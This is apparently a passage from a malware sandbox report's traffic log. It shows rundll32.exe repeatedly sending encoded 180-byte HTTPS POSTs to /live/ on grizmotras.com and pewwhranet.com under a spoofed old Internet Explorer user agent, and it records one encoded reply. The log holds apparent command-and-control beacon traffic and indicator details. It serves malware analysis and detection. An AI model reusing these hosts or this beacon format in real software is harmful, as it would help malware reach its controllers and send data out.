                                                                                                2024-04-26 21:20:21 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                62192.168.2.549785172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:25 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:25 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                63192.168.2.549786104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:29 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:29 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                64192.168.2.549787172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:34 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:34 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                65192.168.2.549788104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:38 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:38 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                66192.168.2.549789172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:42 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:42 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                67192.168.2.549790104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:46 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:46 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                68192.168.2.549791172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:51 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:51 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                69192.168.2.549792104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:55 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:55 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                70192.168.2.549793172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:20:59 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:59 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                71192.168.2.549794104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:04 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:04 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                72192.168.2.549795172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:08 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:08 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                73192.168.2.549796104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:12 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:12 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                74192.168.2.549797172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:16 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:16 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:21:20 UTC582INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:21:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=71uYoDhVQM%2FCUpvgGXIIrLnoubWt%2FoYOcbqImOqMF8rsQtOKP3GE%2BO2nj5ETrTxGCMjm666Cp%2BYNhAp75MMvURN%2Bp7B8IzZddXA7EU4YBDfHS%2F1kbyMQk9vv7Wx0YshT3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99f220ee47441-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:21:20 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:21:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                75192.168.2.549798172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:20 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:20 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                76192.168.2.549799104.21.84.207443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:21:24 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:21:24 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


